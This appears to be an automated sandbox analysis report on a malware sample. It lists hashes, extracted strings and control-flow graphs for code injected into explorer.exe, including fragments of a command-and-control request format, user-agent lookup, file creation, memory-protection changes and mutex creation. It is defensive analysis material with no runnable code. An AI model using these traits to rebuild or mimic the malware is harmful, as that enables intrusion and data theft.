                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                    • Instruction Fuzzy Hash: EBD022370E010CFBCB119F62CC01F903BA8E760BA0F004020B914870A0C63AE850C580
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f0235248c90c2e691226bb83edef35311cc9c3986ac3171a99ce05d7932ad793
                                                    • Instruction ID: d31eb231f455f2845dbac087c50f977c110227ba96f188e7d576388adf41cc7e
                                                    • Opcode Fuzzy Hash: f0235248c90c2e691226bb83edef35311cc9c3986ac3171a99ce05d7932ad793
                                                    • Instruction Fuzzy Hash: A1D09E34655502DBDF1EEB59C554BAA7E78EB14A81B400068E61152520E369DD019A50
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction ID: e0f2aeb1723b366c1e216c922e1f74140d7b754a7641d598f42fbdd10b777592
                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction Fuzzy Hash: 51D0C939212E80CFD76FCB4CC5A4B1573A4BB48B84FC50490F801CBB22D7ACE980CA00
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                    • Instruction ID: 2d413a822a135f6e528a49668e7cc92221f7930e409ff582c9bb85487012a869
                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                    • Instruction Fuzzy Hash: 3FC01232150644AFC7159A95CD01F0177A9E798B40F000021F61447570C671E811D644
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction ID: a7f24bb556cf55ec217ac3f89ab4b6b11bf121d469d8907085ad6506e52992c8
                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction Fuzzy Hash: 6ED01236100288EFCB05DF41C890D9A772AFBD8710F108019FD19077108A32ED62DA50
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction ID: f433abd490de2097aada17e30a7205f0dbff20f91af169121b4ed74ef096becd
                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction Fuzzy Hash: F3C04C75711541CFCF19DB19D294F4977F4F744754F150890E855CB721E724E801CA10
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6600acb80c8db212c336adf98dd6e0edbbe1f96e9ba1352b21325d41aa56077e
                                                    • Instruction ID: 2e5d6cf6f3a9c3c70fdb56af09f60718391b73a8b05ba2d5ecd6435060ad250e
                                                    • Opcode Fuzzy Hash: 6600acb80c8db212c336adf98dd6e0edbbe1f96e9ba1352b21325d41aa56077e
                                                    • Instruction Fuzzy Hash: 88900231A05804129644715849845464005A7E1301B55C011E0529554CCB188A565365
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd5c2863f5a4e42dd540f216d8a1c270233b0d3f964697712e4739c7b6abaae1
                                                    • Instruction ID: f485a2cc6ab4c04b3fc7a3a7be46ff5aed69c869646334dbac693c55ef67dd6a
                                                    • Opcode Fuzzy Hash: dd5c2863f5a4e42dd540f216d8a1c270233b0d3f964697712e4739c7b6abaae1
                                                    • Instruction Fuzzy Hash: 2A900261A01504424644715849044066005A7E2301395C115A0659560CC71C8955936D
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
                                                    • Instruction ID: 69707687f69e99cd1cb41684c8419a7aa1c1aa1f2a8deb61de72fea51323fc01
                                                    • Opcode Fuzzy Hash: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
                                                    • Instruction Fuzzy Hash: FF51D6B5E00116BFCF1AEB9D889097EFBF8BB49240714C169E465D7645E334DE50CBA0
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 8ea2b0c3605b3a27e7399c1b8011248b1d234d543d5e95d6c25feeeca204d8d1
                                                    • Instruction ID: b48932e4e2b2988d452666c421728d361617968f38b1710bd57b9250fc561fc5
                                                    • Opcode Fuzzy Hash: 8ea2b0c3605b3a27e7399c1b8011248b1d234d543d5e95d6c25feeeca204d8d1
                                                    • Instruction Fuzzy Hash: 94510675A04646AFDB38DF9CC8909BFBBF9EB48200B04845DE6A6D7641E7B4DA40C760
                                                    Strings
                                                    • Execute=1, xrefs: 011B4713
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011B4725
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011B4655
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011B4742
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 011B4787
                                                    • ExecuteOptions, xrefs: 011B46A0
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011B46FC
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: 1a665e051f5ffc97a20899f42fe36af8a1123e31480bdcc17ab3c6c45dfd7dbf
                                                    • Instruction ID: 5a064d150f2aa202352219ff063d68271cdff5cbeda218f01088ee5c1b9e6775
                                                    • Opcode Fuzzy Hash: 1a665e051f5ffc97a20899f42fe36af8a1123e31480bdcc17ab3c6c45dfd7dbf
                                                    • Instruction Fuzzy Hash: 8B51FB31A0021A7AEF1DEBA8EC9DFED77B9AF14704F0400A9E605A72C1E7719A45CF51
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: fe45715b8f8d229e94fc45f6a92100cda8e7df24535097717a438fc5954938b5
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 9681D170E196498EEF2DBE6CC8507FEBBB1AF46324F28C119D861A72D1C73498408F59
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    • Opcode ID: 6f1c41d52d4601b9be3ce053fa0e97d503a9fe5ccf1d5f168e599a915f5c2b97
                                                    • Instruction ID: d4c53aeaa99499daddf9d6f500d89c21c6b3213981457bf18748543585adddbd
                                                    • Opcode Fuzzy Hash: 6f1c41d52d4601b9be3ce053fa0e97d503a9fe5ccf1d5f168e599a915f5c2b97
                                                    • Instruction Fuzzy Hash: 5621657AA00119ABDB19DF79DC40AEFBBF8EF54644F44011AEA15D3200E730D9018BA5
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011B02BD
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011B02E7
                                                    • RTL: Re-Waiting, xrefs: 011B031E
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: c4d6f54ff0c17dd07d38def4caa4dc94f6e6fda24ff43ec6736ecf5c42084a81
                                                    • Instruction ID: e1650a682ee27013a11818285e0f8c5e74d617494d06113a53f383a19b2fcd1a
                                                    • Opcode Fuzzy Hash: c4d6f54ff0c17dd07d38def4caa4dc94f6e6fda24ff43ec6736ecf5c42084a81
                                                    • Instruction Fuzzy Hash: CCE10E302087429FD72DCF28D894B6ABBE4BB88314F144A5DF5A58B2E1D735D856CB42
                                                    Strings
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011B7B7F
                                                    • RTL: Re-Waiting, xrefs: 011B7BAC
                                                    • RTL: Resource at %p, xrefs: 011B7B8E
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: 04b415ef343ee9c3ce4d7f015fc038373db29f8901535b5abe2938a99e983715
                                                    • Instruction ID: a91fb0a753d1051d5ea198f9884b8ee185fc1198a308fa2d9ccc9c6a5a31793a
                                                    • Opcode Fuzzy Hash: 04b415ef343ee9c3ce4d7f015fc038373db29f8901535b5abe2938a99e983715
                                                    • Instruction Fuzzy Hash: F041E2313097029FD728DE29C940B6AB7E5EF99B10F100A1DF95AD7780DB31E5058F96
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011B728C
                                                    Strings
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011B7294
                                                    • RTL: Re-Waiting, xrefs: 011B72C1
                                                    • RTL: Resource at %p, xrefs: 011B72A3
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 7ff8fbd07841db4e01dfefbfa1fcc2db718373be23fb6e88d43d762dd7fa7362
                                                    • Instruction ID: 7d970548414c21649d9c471b49787a0bcf046a689a1d6e5f7c95ecce3b3f41da
                                                    • Opcode Fuzzy Hash: 7ff8fbd07841db4e01dfefbfa1fcc2db718373be23fb6e88d43d762dd7fa7362
                                                    • Instruction Fuzzy Hash: 7141F031604206ABC729DE29CC81BAAB7B5FFA4714F100619F956AB3C0DB31E852CBD5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: e249ef761969b8053431df36cfcced270ff9530a3233e4c20c32f3de7a100c8d
                                                    • Instruction ID: 59df2f3e9c5005c84ae6ad619095c4f6f4bbf069506ccd63b602cf81349ba877
                                                    • Opcode Fuzzy Hash: e249ef761969b8053431df36cfcced270ff9530a3233e4c20c32f3de7a100c8d
                                                    • Instruction Fuzzy Hash: 01316672A006199FDB28DF2DDC40BEEB7F8FB58614F444559E949E3240EB30DA458FA0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: 3ed77d1a1ce381180f291ae0c832fcef4bcb33fd3867a52c4e20fe6b6ce0aa6d
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 42919471E002169AEB2CEF6DC8816BEBBA5AF44720F64C51AE965E72C0D73099418F52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 7d69e4be699960bf1036b2cf5b6d7220f6133c0332ff4cd333ce9662302f5806
                                                    • Instruction ID: 43bc7339d5a2aecf149d4202c4e6b2eb593f6aca23cc6093a1b3160a2ecdd6d4
                                                    • Opcode Fuzzy Hash: 7d69e4be699960bf1036b2cf5b6d7220f6133c0332ff4cd333ce9662302f5806
                                                    • Instruction Fuzzy Hash: 94812C75D002699BDB39DB54CC44BEEBBB8AF08754F0041EAEA19B7280D7705E85CFA1

                                                    Execution Graph

                                                    Execution Coverage: 2.3%
                                                    Dynamic/Decrypted Code Coverage: 0%
                                                    Signature Coverage: 4.7%
                                                    Total number of Nodes: 444
                                                    Total number of Limit Nodes: 16

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: getaddrinforecvsetsockopt
                                                    • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                    • API String ID: 1564272048-1117930895
                                                    • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                    • Instruction ID: 15870bd6d3e593e71a466f2bf68988e170ebdd28d2c43551dd683b0dda1ce36a
                                                    • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                    • Instruction Fuzzy Hash: 45527131618B088BCB69EF68C4A47EAB7E1FB54300F514A2FD49FC7246DE70A949C751

                                                    Control-flow Graph

                                                    control_flow_graph 303 e4da232-e4da256 304 e4da8bd-e4da8cd 303->304 305 e4da25c-e4da260 303->305 305->304 306 e4da266-e4da2a0 305->306 307 e4da2bf 306->307 308 e4da2a2-e4da2a6 306->308 310 e4da2c6 307->310 308->307 309 e4da2a8-e4da2ac 308->309 311 e4da2ae-e4da2b2 309->311 312 e4da2b4-e4da2b8 309->312 313 e4da2cb-e4da2cf 310->313 311->310 312->313 314 e4da2ba-e4da2bd 312->314 315 e4da2f9-e4da30b 313->315 316 e4da2d1-e4da2f7 call e4da942 313->316 314->313 320 e4da378 315->320 321 e4da30d-e4da332 315->321 316->315 316->320 324 e4da37a-e4da3a0 320->324 322 e4da334-e4da33b 321->322 323 e4da3a1-e4da3a8 321->323 325 e4da33d-e4da360 call e4da942 322->325 326 e4da366-e4da370 322->326 327 e4da3aa-e4da3d3 call e4da942 323->327 328 e4da3d5-e4da3dc 323->328 325->326 326->320 332 e4da372-e4da373 326->332 327->320 327->328 329 e4da3de-e4da40a call e4da942 328->329 330 e4da410-e4da458 NtCreateFile call e4da172 328->330 329->320 329->330 339 e4da45d-e4da45f 330->339 332->320 339->320 340 e4da465-e4da46d 339->340 340->320 341 e4da473-e4da476 340->341 342 e4da478-e4da481 341->342 343 e4da486-e4da48d 341->343 342->324 344 e4da48f-e4da4b8 call e4da942 343->344 345 e4da4c2-e4da4ec 343->345 344->320 350 e4da4be-e4da4bf 344->350 351 e4da8ae-e4da8b8 345->351 352 e4da4f2-e4da4f5 345->352 350->345 351->320 353 e4da4fb-e4da4fe 352->353 354 e4da604-e4da611 352->354 355 e4da55e-e4da561 353->355 356 e4da500-e4da507 353->356 354->324 361 e4da567-e4da572 355->361 362 e4da616-e4da619 355->362 358 e4da509-e4da532 call e4da942 356->358 359 e4da538-e4da559 356->359 358->320 358->359 366 e4da5e9-e4da5fa 359->366 367 e4da574-e4da59d call e4da942 361->367 368 e4da5a3-e4da5a6 361->368 364 e4da61f-e4da626 362->364 365 e4da6b8-e4da6bb 362->365 373 e4da628-e4da651 call e4da942 364->373 374 e4da657-e4da66b call e4dbe92 364->374 370 e4da6bd-e4da6c4 365->370 371 e4da739-e4da73c 365->371 366->354 367->320 367->368 368->320 369 e4da5ac-e4da5b6 368->369 369->320 
377 e4da5bc-e4da5e6 369->377 378 e4da6f5-e4da734 370->378 379 e4da6c6-e4da6ef call e4da942 370->379 381 e4da7c4-e4da7c7 371->381 382 e4da742-e4da749 371->382 373->320 373->374 374->320 391 e4da671-e4da6b3 374->391 377->366 401 e4da894-e4da8a9 378->401 379->351 379->378 381->320 387 e4da7cd-e4da7d4 381->387 384 e4da74b-e4da774 call e4da942 382->384 385 e4da77a-e4da7bf 382->385 384->351 384->385 385->401 392 e4da7fc-e4da803 387->392 393 e4da7d6-e4da7f6 call e4da942 387->393 391->324 399 e4da82b-e4da835 392->399 400 e4da805-e4da825 call e4da942 392->400 393->392 399->351 402 e4da837-e4da83e 399->402 400->399 401->324 402->351 406 e4da840-e4da886 402->406 406->401
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: `
                                                    • API String ID: 823142352-2679148245
                                                    • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                    • Instruction ID: e6e34d5396128844556de2b8e32638e924c8f44d0c0f05a01bd674cb2c76d1a0
                                                    • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                    • Instruction Fuzzy Hash: 6E224D70A18A099FCB59DF68C4A86AEF7E1FB98301F40462FE45ED3250DB30E855DB85

                                                    Control-flow Graph

                                                    control_flow_graph 447 e4dbe12-e4dbe38 448 e4dbe45-e4dbe6e NtProtectVirtualMemory 447->448 449 e4dbe40 call e4da942 447->449 450 e4dbe7d-e4dbe8f 448->450 451 e4dbe70-e4dbe7c 448->451 449->448
                                                    APIs
                                                    • NtProtectVirtualMemory.NTDLL ref: 0E4DBE67
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2706961497-0
                                                    • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                    • Instruction ID: e303e7de4338020010ef2c6361804af55ccf7a62d7117892250dcc7428bfe712
                                                    • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                    • Instruction Fuzzy Hash: 2D019E30628B484F8B88EF6C948022AB7E4FBD9214F000B3EE99AC3250EB60C9414742

                                                    Control-flow Graph

                                                    control_flow_graph 452 e4dbe0a-e4dbe6e call e4da942 NtProtectVirtualMemory 455 e4dbe7d-e4dbe8f 452->455 456 e4dbe70-e4dbe7c 452->456
                                                    APIs
                                                    • NtProtectVirtualMemory.NTDLL ref: 0E4DBE67
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2706961497-0
                                                    • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                    • Instruction ID: 0c304a6500eb2a10b1f476654c10508b68274cf2f4ca07500951ff2e9400f122
                                                    • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                    • Instruction Fuzzy Hash: 1A01A23462CB884B8B48EB6C94512A6B3E5FBCE314F000B7FE99AC3240DB61D9064782

                                                    Control-flow Graph

                                                    APIs
                                                    • ObtainUserAgentString.URLMON ref: 0E4D59A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: AgentObtainStringUser
                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                    • API String ID: 2681117516-319646191
                                                    • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                    • Instruction ID: cf808336960f510071f721c6e574333e54c2c25f5c8fd79546723be30017ab72
                                                    • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                    • Instruction Fuzzy Hash: 1A31DF31618A0C8BCB05EFA9C8947EEB7E1FB58215F40062FD44ED7240DE788A49C789

                                                    Control-flow Graph

                                                    APIs
                                                    • ObtainUserAgentString.URLMON ref: 0E4D59A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: AgentObtainStringUser
                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                    • API String ID: 2681117516-319646191
                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                    • Instruction ID: 922b587f63878f4feb806e6ec86f4deb64008761e50289c01ff242696a286602
                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                    • Instruction Fuzzy Hash: 4421F570618A0C8BCB05EFA9C8A47EEBBE1FF58204F40061FD45AD7240DF748A08C789

                                                    Control-flow Graph

                                                    control_flow_graph 232 e4d1b66-e4d1b68 233 e4d1b6a-e4d1b6b 232->233 234 e4d1b93-e4d1bb8 232->234 235 e4d1b6d-e4d1b71 233->235 236 e4d1bbe-e4d1c22 call e4d8612 call e4da942 * 2 233->236 237 e4d1bbb-e4d1bbc 234->237 235->237 238 e4d1b73-e4d1b92 235->238 246 e4d1cdc 236->246 247 e4d1c28-e4d1c2b 236->247 237->236 238->234 249 e4d1cde-e4d1cf6 246->249 247->246 248 e4d1c31-e4d1cd3 call e4dcda4 call e4dc022 call e4dc3e2 call e4dc022 call e4dc3e2 CreateMutexW 247->248 248->246 263 e4d1cd5-e4d1cda 248->263 263->249
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID: .dll$el32$kern
                                                    • API String ID: 1964310414-1222553051
                                                    • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                    • Instruction ID: 91206b54e7549079cbe26b5090dcdea764536aecd6522e6084ef0d70bfcc075f
                                                    • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                    • Instruction Fuzzy Hash: 1C416F70918A0C8FDB55EFA8C8E47ADB7E0FB58300F44467BC84ADB255DE349949CB85

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID: .dll$el32$kern
                                                    • API String ID: 1964310414-1222553051
                                                    • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                    • Instruction ID: b4e7ba0979064e68e7a1e342acf9cacc05a07020ca070c47250b9fdbc6c46c28
                                                    • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
